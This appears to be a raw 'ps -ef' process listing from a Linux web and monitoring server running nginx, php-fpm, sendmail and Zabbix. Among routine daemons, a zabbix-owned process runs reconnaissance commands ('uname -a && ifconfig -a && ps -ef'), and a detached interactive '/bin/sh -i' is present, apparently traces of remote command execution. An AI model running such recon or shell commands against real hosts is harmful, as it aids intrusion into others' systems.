[kjournald] root 2584 1 0 2012 ? 00:01:32 /sbin/dhclient -1 -q -lf /var/lib/dhclient/dhclient-usb0.leases -pf /var/run/dhclient-usb0.pid usb0 root 2667 1 0 2012 ? 04:25:00 syslogd -m 0 root 2670 1 0 2012 ? 00:00:00 klogd -x root 2725 99 0 2012 ? 00:00:00 [kondemand/0] root 2726 99 0 2012 ? 00:00:00 [kondemand/1] root 2727 99 0 2012 ? 00:00:02 [kondemand/2] root 2728 99 0 2012 ? 00:00:03 [kondemand/3] root 2745 1 0 2012 ? 00:11:36 irqbalance rpc 2765 1 0 2012 ? 00:00:00 portmap root 2798 99 0 2012 ? 00:00:00 [rpciod/0] root 2799 99 0 2012 ? 00:00:00 [rpciod/1] root 2800 99 0 2012 ? 00:00:00 [rpciod/2] root 2801 99 0 2012 ? 00:00:00 [rpciod/3] dbus 2866 1 0 2012 ? 00:07:15 dbus-daemon --system root 2889 1 0 2012 ? 00:00:00 /usr/sbin/hcid root 2893 1 0 2012 ? 00:00:00 /usr/sbin/sdpd root 2924 1 0 2012 ? 00:00:00 [krfcommd] root 2984 1 0 2012 ? 00:00:00 /usr/sbin/acpid 68 2997 1 0 2012 ? 00:00:05 hald root 2998 2997 0 2012 ? 00:00:00 hald-runner 68 3006 2998 0 2012 ? 00:00:00 hald-addon-acpi: listening on acpid socket /var/run/acpid.socket root 3037 1 0 2012 ? 00:00:00 /usr/bin/hidd --server root 3148 1 0 2012 ? 00:00:00 gpm -m /dev/input/mice -t exps2 root 3163 1 0 2012 ? 00:01:15 crond xfs 3192 1 0 2012 ? 00:00:00 xfs -droppriv -daemon root 3217 1 0 2012 ? 00:00:00 /usr/sbin/atd root 3272 1 0 2012 ? 00:00:00 /usr/sbin/smartd -q never root 3275 1 0 2012 tty1 00:00:00 /sbin/mingetty tty1 root 3276 1 0 2012 tty2 00:00:00 /sbin/mingetty tty2 root 3277 1 0 2012 tty3 00:00:00 /sbin/mingetty tty3 root 3280 1 0 2012 tty4 00:00:00 /sbin/mingetty tty4 root 3281 1 0 2012 tty5 00:00:00 /sbin/mingetty tty5 root 3286 1 0 2012 tty6 00:00:00 /sbin/mingetty tty6 root 3331 1 0 2012 ? 00:39:34 /usr/bin/python -tt /usr/sbin/yum-updatesd root 3333 1 0 2012 ? 00:00:07 /usr/libexec/gam_server root 7190 20289 1 22:04 ? 00:00:04 sendmail: ./t0J94UmK006337 from queue root 7265 3163 0 22:09 ? 00:00:00 crond root 7266 7265 0 22:09 ? 00:00:00 [ntpdate] &lt;defunct&gt; root 7267 7265 0 22:09 ? 00:00:00 /usr/sbin/sendmail -FCronDaemon -i -odi -oem -oi -t root 7270 1 0 22:09 ? 00:00:00 sendmail: ./t0KE95BR007268 man001.localdomain.: user open zabbix 7272 316 0 22:09 ? 00:00:00 sh -c uname -a && ifconfig -a &&ps -ef zabbix 7275 7272 0 22:09 ? 00:00:00 ps -ef root 8886 1 0 2014 ? 00:00:00 SCREEN -S awstats root 8887 8886 0 2014 pts/4 00:00:00 /bin/bash zabbix 13537 1 0 2014 ? 00:00:00 /bin/sh -i root 16102 99 0 2014 ? 00:01:46 [pdflush] root 16851 1 0 2012 ? 00:00:00 /sbin/udevd -d www 19090 26259 0 04:05 ? 00:00:00 nginx: worker process www 19091 26259 0 04:05 ? 00:00:00 nginx: worker process www 19092 26259 0 04:05 ? 00:00:00 nginx: worker process www 19098 26259 0 04:05 ? 00:00:00 nginx: worker process zabbix 19913 1 0 2014 ? 00:00:00 /usr/local/zabbix2/sbin/zabbix_agentd zabbix 19914 19913 0 2014 ? 00:00:48 /usr/local/zabbix2/sbin/zabbix_agentd zabbix 19915 19913 0 2014 ? 00:10:00 /usr/local/zabbix2/sbin/zabbix_agentd zabbix 19916 19913 0 2014 ? 00:09:53 /usr/local/zabbix2/sbin/zabbix_agentd zabbix 19918 19913 0 2014 ? 00:10:00 /usr/local/zabbix2/sbin/zabbix_agentd root 20289 1 0 2012 ? 00:15:05 sendmail: accepting connections smmsp 20297 1 0 2012 ? 00:00:00 sendmail: Queue runner@01:00:00 for /var/spool/clientmqueue root 20338 1 0 2012 ? 01:19:29 auditd root 20340 20338 0 2012 ? 00:08:56 /sbin/audispd root 20587 1 0 2012 ? 00:10:08 /usr/sbin/sshd root 20613 1 0 2012 ? 00:03:27 pcscd root 20682 1 0 2012 ? 00:00:00 rpc.idmapd rpcuser 20735 1 0 2012 ? 00:00:00 rpc.statd root 20952 1 0 2012 ? 00:00:05 automount root 20990 1 0 2012 ? 00:00:00 cupsd avahi 21064 1 0 2012 ? 00:00:03 avahi-daemon: running [lenovo-man001.local] avahi 21065 21064 0 2012 ? 00:00:00 avahi-daemon: chroot helper root 21444 1 0 2012 ? 00:00:00 /usr/local/lib/erlang/erts-5.7.2/bin/epmd -daemon root 26259 1 0 2014 ? 00:00:01 nginx: master process /usr/local/nginx/sbin/nginx -c /usr/local/nginx/conf/nginx.conf www 27821 1 0 2012 ? 00:00:02 /usr/local/memcached/bin/memcached -d -m 64 -uwww -p 11211 root 28668 99 0 2014 ? 00:01:01 [pdflush] root 29312 1 0 2014 ? 00:00:06 php-fpm: master process (/usr/local/php/etc/php-fpm.conf) www 29313 29312 0 2014 ? 00:05:57 php-fpm: pool www www 29314 29312 0 2014 ? 00:05:54 php-fpm: pool www www 29315 29312 0 2014 ? 00:05:55 php-fpm: pool www www 29316 29312 0 2014 ? 00:06:07 php-fpm: pool www www 29317 29312 0 2014 ? 00:06:06 php-fpm: pool www www 29318 29312 0 2014 ? 00:05:58 php-fpm: pool www www 29319 29312 0 2014 ? 00:05:48 php-fpm: pool www www 29320 29312 0 2014 ? 00:05:51 php-fpm: pool www www 29321 29312 0 2014 ? 00:05:58 php-fpm: pool www www 29322 29312 0 2014 ? 00:05:52 php-fpm: pool www www 29323 29312 0 2014 ? 00:06:01 php-fpm: pool www www 29324 29312 0 2014 ? 00:05:48 php-fpm: pool www www 29325 29312 0 2014 ? 00:05:52 php-fpm: pool www www 29326 29312 0 2014 ? 00:06:04 php-fpm: pool www www 29327 29312 0 2014 ? 00:05:51 php-fpm: pool www www 29328 29312 0 2014 ? 00:05:58 php-fpm: pool www www 29329 29312 0 2014 ? 00:05:55 php-fpm: pool www www 29330 29312 0 2014 ? 00:06:01 php-fpm: pool www www 29331 29312 0 2014 ? 00:05:46 php-fpm: pool www www 29332 29312 0 2014 ? 00:05:53 php-fpm: pool www root 30862 1 0 2012 ? 01:39:45 /usr/sbin/snmpd -Lsd -Lf /dev/null -p /var/run/snmpd.pid -a zabbix 31513 1 0 2014 ? 00:00:00 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31515 31513 0 2014 ? 00:23:36 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31516 31513 0 2014 ? 00:00:31 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31517 31513 0 2014 ? 08:59:36 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31518 31513 0 2014 ? 00:09:46 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31519 31513 0 2014 ? 00:00:49 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31520 31513 0 2014 ? 01:35:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31521 31513 0 2014 ? 02:15:26 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31522 31513 0 2014 ? 00:04:27 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31523 31513 0 2014 ? 00:05:55 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31524 31513 0 2014 ? 00:05:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31525 31513 0 2014 ? 00:05:54 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31526 31513 0 2014 ? 00:05:51 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31527 31513 0 2014 ? 00:05:53 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31529 31513 0 2014 ? 00:00:47 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31530 31513 0 2014 ? 00:00:03 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31533 31513 0 2014 ? 04:10:50 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31534 31513 0 2014 ? 00:20:52 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31535 31513 0 2014 ? 1-14:44:33 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31538 31513 0 2014 ? 00:08:15 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31542 31513 0 2014 ? 00:00:28 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31543 31513 0 2014 ? 02:13:29 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31544 31513 0 2014 ? 02:13:49 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31546 31513 0 2014 ? 02:13:37 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31548 31513 0 2014 ? 02:14:10 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31549 31513 0 2014 ? 00:02:09 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31550 31513 0 2014 ? 00:00:23 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf zabbix 31551 31513 0 2014 ? 00:00:33 /usr/local/zabbix/sbin/zabbix_server -c /etc/zabbix/zabbix_server.conf